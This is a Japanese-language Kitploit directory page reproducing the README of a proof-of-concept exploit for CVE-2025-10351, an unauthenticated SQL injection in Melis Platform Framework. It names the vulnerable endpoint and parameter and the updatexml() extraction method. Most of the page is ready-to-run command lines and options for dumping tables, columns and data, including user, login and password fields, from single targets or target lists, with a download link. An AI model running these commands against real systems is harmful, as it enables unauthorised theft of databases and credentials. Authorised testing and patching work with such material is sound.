Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-10351-POC — CVE-2025-10351 のエクスプロイト。Melis Platform Framework における SQL インジェクション | Kitploit
ツール/GitHubGitHub/ivansmc/cve-2025-10351-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストデータベースセキュリティ
GitHubivansmc/cve-2025-10351-poc

CVE-2025-10351-POC

CVE-2025-10351 のエクスプロイト。Melis Platform Framework における SQL インジェクション

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-10351 POC - SQLインジェクションエクスプロイト 💉

CVE-2025-10351のPOC: Melis Platform Frameworkの特定のエンドポイントに影響を与える、認証されていないSQLインジェクションの脆弱性。

status python status


🔗 参照

  • 📄 MITREのCVE-2025-10351
  • 📄 INCIBE(スペイン国立サイバーセキュリティ研究所)のMelis Platform警告

🚀 説明

このPOCは、以下のエンドポイントの認証されていないエラーベースSQLインジェクションの脆弱性を対象としています:

root@kitploit:~
melis/MelisCms/PageEdition/getTinyTemplates?idPage=

MySQLのupdatexml()を利用して以下を抽出します:

  • テーブル名
  • カラム名
  • 特定のまたはすべてのカラムからのデータ

また、さらなる手動での悪用のための時間ベースSQLiベクターも検出します。


🛠️ 要件

以下のコマンドで依存関係をインストールします:

root@kitploit:~
pip3 install -r requirements.txt

🧪 使用方法

基本チェック

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80

URLリストから

root@kitploit:~
python3 CVE-2025-10351-POC.py -l targets.txt

すべてのテーブル名を抽出

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at

テーブルからすべてのカラム名を抽出

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users

すべてのカラムからすべてのデータを抽出

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac

特定のカラムを抽出

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password

非セキュアモード、クッキー、デバッグモードでプロキシを使用

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug

⚙️ オプション


📤 出力

  • 抽出されたテーブルは tables_extracted.txt に保存されます
  • 抽出されたデータは <table_name>_data.txt に保存されます

⚠️ 免責事項

この文書は、許可されたセキュリティテストおよび是正措置のみを目的としています。所有していない、またはテストする明示的な許可を得ていないシステムに対して、PoCや再現手順を使用しないでください。著者は誤用について責任を負いません。


❤️ を込めて Manuel Iván San Martín Castillo が作成

ツールをダウンロード
引数説明
-uターゲットURL
-pポート(80、443など)
-lURLリストを含むファイル
-s時間ベーステスト用のスリープ時間(デフォルト: 1秒)
-atすべてのテーブル名をダンプ
-tテーブル名を指定
-ac指定テーブルのすべてのカラムをダンプ
-cダンプするカラムのカンマ区切りリスト
--proxyBurp Proxy http://127.0.0.1:8080
--insecureプロキシ接続使用時にTLSチェックを無効化
--cookie認証リクエスト用のクッキー
--debugデバッグモード